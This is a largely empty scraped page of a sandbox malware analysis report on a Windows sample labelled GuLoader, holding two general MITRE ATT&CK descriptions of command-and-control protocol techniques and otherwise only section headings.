Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report pRcHGlVekw.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: GuLoader

Yara Overview

Memory Dumps

Sigma Overview

Jbx Signature Overview

AV Detection:

Compliance:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers